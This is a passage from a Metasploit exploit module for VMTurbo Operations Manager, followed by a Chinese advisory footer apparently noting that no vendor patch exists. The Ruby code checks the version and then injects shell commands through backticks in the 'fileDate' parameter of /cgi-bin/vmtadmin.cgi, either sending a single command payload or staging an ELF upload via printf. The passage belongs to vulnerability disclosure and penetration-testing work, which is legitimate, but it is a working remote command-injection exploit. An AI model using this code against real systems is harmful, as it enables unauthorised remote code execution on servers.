vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
else
vprint_status("#{peer} - Unexpected vmtadmin.cgi response")
return Exploit::CheckCode::Unknown
end
if version and version <= "4.6" and build < "28657"
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/vmtadmin.cgi',
'method' => 'GET',
'vars_get' => {
"callType" => "DOWN",
"actionType" => "CFGBACKUP",
"fileDate" => "\"`#{cmd}`\""
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("#{peer} - Failed to connect to the web server")
return nil
end
vprint_status("Sent command #{cmd}")
end
#
# generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
# manually sets one. This method is a temp work-around.
#
def check_generate_payload_exe
if generate_payload_exe.nil?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
end
end
def exploit
# Handle single command shot
if target.name =~ /CMD/
cmd = payload.encoded
res = execute_command(cmd, {})
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
end
print_status("#{peer} - Blind Exploitation - unknown exploitation state")
return
end
check_generate_payload_exe
# Handle payload upload using CmdStager mixin
execute_cmdstager({:flavor => :printf})
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
vmturbo
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: